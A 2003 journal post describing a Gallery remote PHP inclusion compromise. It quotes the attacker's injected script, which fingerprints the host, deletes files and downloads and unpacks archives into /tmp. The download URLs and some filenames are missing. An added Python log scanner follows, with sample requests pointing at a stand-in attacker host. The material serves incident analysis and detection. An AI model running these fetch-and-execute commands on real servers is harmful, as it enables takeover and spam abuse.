
Purdy (2383)


Journal of Purdy (2383)

Friday May 23, 2003
08:15 AM

Hijack through PHP and Hack/Spam through Perl

[ #12402 ]

Thought you guys would find this interesting. I found the source of the spam problem that I was going through twice: a vulnerability in Gallery (versions prior to 1.3.3). You can read my thread to see the technical details, but here's the gist.

Gallery would allow a remote inclusion of another PHP script, which for this spam hack, looked like this:

<?echo "<pre>";

passthru("which perl");
passthru("which dig");
echo "uname ";
passthru("uname -a");
echo "\nhostname ";
echo "\n";


passthru("kill -9 `cat /tmp/sess_9e4d0713ad1a561e77c93643bafef7a8`");
passthru("rm -rf /tmp/af56j");
passthru("mkdir /tmp/af56j");
passthru("fetch -o- > /tmp/af56j/archive1.tgz");
passthru("lynx -dump -source > /tmp/af56j/archive2.tgz");
passthru("wget -P /tmp/af56j");
passthru("ls -la/tmp/af56j");
passthru("tar -zxvf /tmp/af56j/archive.tgz -C /tmp/af56j");
passthru("tar -zxvf /tmp/af56j/archive1.tgz -C /tmp/af56j");
passthru("tar -zxvf /tmp/af56j/archive2.tgz -C /tmp/af56j");
passthru("rm -rf /tmp/af56j/archive*");
passthru("chmod 700 /tmp/af56j/");

passthru("rm -f /tmp/af56j/");
passthru("ls -la /tmp/af56j");

Here are the contents of archive2.tgz:

$ tar -tzvf archive2.tgz
-rwxrwxr-x adminsp/games 5044 2003-05-12 05:22
drwxrwxr-x adminsp/games 0 2003-03-02 09:58 lib/
drwxrwxr-x adminsp/games 0 2003-02-01 06:29 lib/Net/
-r--rw-r-- adminsp/games 8762 2003-02-03 05:11 lib/Net/
-r--rw-r-- adminsp/games 9703 2003-02-03 05:11 lib/Net/
-r--rw-r-- adminsp/games 3387 2003-02-03 05:11 lib/Net/
-rw-r--r-- adminsp/1000 3771 2003-02-03 05:10 lib/

Then, here's the script (linked to, to keep this post short{er}).
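
Since the entry point described above is a request that points an include at a remote PHP script, the web server's access log is the first place it shows up. The following is an added example, not part of the original post or of Gallery's code: it scans Combined Log Format lines for query parameters whose decoded value is a remote URL. The log lines, the `inc_dir` parameter, the `page.php` path and all host names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Combined Log Format: client ... "METHOD target PROTOCOL" status ...
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
REMOTE_SCHEME_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (not from the original incident).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/May/2003:05:30:01 -0400] "GET /gallery/albums.php HTTP/1.0" 200 5120',
    '198.51.100.7 - - [12/May/2003:05:31:44 -0400] "GET /gallery/page.php?inc_dir=http://attacker.invalid/ HTTP/1.0" 200 812',
    '198.51.100.7 - - [12/May/2003:05:32:02 -0400] "GET /gallery/page.php?id=3&inc_dir=http%3A%2F%2Fattacker.invalid%2Fx.txt HTTP/1.0" 200 790',
    '192.0.2.33 - - [12/May/2003:05:40:10 -0400] "GET /login.php?return=http://www.example.com/gallery/ HTTP/1.0" 302 0',
]

def remote_include_params(target, own_hosts=()):
    """Return [(param, url)] for query parameters whose URL-decoded value is
    a remote URL on a host that is not listed in own_hosts."""
    hits = []
    # parse_qsl percent-decodes each value once, as PHP does for $_GET.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = value.strip()
        if not REMOTE_SCHEME_RE.match(value):
            continue
        try:
            host = (urlsplit(value).hostname or "").lower()
        except ValueError:  # malformed authority, e.g. broken IPv6 brackets
            host = ""
        if host not in own_hosts:
            hits.append((name, value))
    return hits

def scan(lines, own_hosts=()):
    """Return one finding per suspicious parameter seen in the log lines."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        client, target, status = m.groups()
        for name, url in remote_include_params(target, own_hosts):
            findings.append({"client": client, "status": int(status),
                             "param": name, "url": url})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG, own_hosts={"www.example.com"}):
        print(f)
```

Passing the site's own host names in `own_hosts` keeps legitimate redirect parameters such as the `return=` line from being reported; a 200 status on a flagged request is the case worth checking against the contents of `/tmp` first.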


